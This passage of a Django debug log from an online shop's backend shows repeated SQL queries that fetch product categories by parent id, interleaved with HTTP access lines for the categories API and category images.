FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:15:03,739 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:15:03,744 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:15:03,749 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:15:03,756 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:15:03,761 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:15:03,765 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:15:03,769 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:15:03,772 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:15:03,780 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:15:03,784 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:15:03,788 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:15:03,792 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:15:03,797 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:15:03,801 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:15:03,806 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:15:03,810 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:15:03,814 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:15:03,819 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:15:03,823 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:15:03] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 13:15:05] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 13:15:05] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2019-12-19 13:15:17,515 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:15:17,527 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 13:15:17,532 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 13:15:17,535 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 13:15:17,538 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 13:15:17,540 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 13:15:17,543 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 13:15:17,545 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 13:15:17,548 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 13:15:17,554 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 13:15:17,556 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 13:15:17,558 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 13:15:17,562 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 13:15:17,565 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 13:15:17,571 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 13:15:17,576 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 13:15:17,580 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 13:15:17,584 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 13:15:17,589 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 13:15:17,596 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 13:15:17,601 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 13:15:17,605 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 13:15:17,610 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 13:15:17,614 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 13:15:17,619 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 13:15:17,625 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 13:15:17,630 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 13:15:17,634 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 13:15:17,638 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 13:15:17,643 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 13:15:17,650 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 13:15:17,655 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 13:15:17,660 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 13:15:17,664 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 13:15:17,670 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 13:15:17,677 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 13:15:17,682 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 13:15:17,687 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 13:15:17,693 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 13:15:17,697 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 13:15:17,701 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 13:15:17,707 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 13:15:17,712 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 13:15:17,717 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 13:15:17,722 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 13:15:17,725 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 13:15:17] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 13:15:18,221 utils 4252 140031721535232 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 13:15:18,228 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 